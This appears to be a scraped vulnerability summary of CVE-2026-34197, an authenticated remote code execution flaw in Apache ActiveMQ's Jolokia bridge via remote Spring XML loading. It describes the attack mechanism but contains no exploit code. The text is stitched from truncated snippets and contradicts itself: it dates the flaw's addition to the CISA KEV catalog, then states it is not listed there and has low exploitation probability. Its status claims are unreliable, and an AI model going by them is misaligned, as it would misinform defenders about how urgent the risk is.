Critical remote code execution vulnerability in Apache ActiveMQ through the Jolokia JMX-HTTP bridge exposed on web console. Authenticated attackers can exploit crafted discovery URIs to trigger remote Spring XML loading, leading to arbitrary code execution via bean factory methods.
Data Source: CIRCL
Confidence: HIGH
Exploitation Method: DIRECT_NETWORK
CVE Published: 2026-04-07
Added to CISA KEV: 2026-04-16 9 DAYS BETWEEN CVE AND KEV
The vulnerability scores 8.8 on CVSS, indicating high severity. The EPSS score is below 1 %, suggesting a low probability of exploitation in the wild, and it is not listed in the CISA KEV catalog. Nevertheless, because it enables remote code execution once an attacker has broker credentials, the risk remains significant. Exploitation requires network access to the broker, valid authentication ...
CVE-2026-34197 Detail.An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
Attackers could execute unauthorized operating system commands, which could then be used to disable the product, or read and modify data for ...
CVE-2026-34197 is an ActiveMQ RCE flaw exploiting Jolokia to execute remote commands. Learn how it works, affected versions, and detection steps.
CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.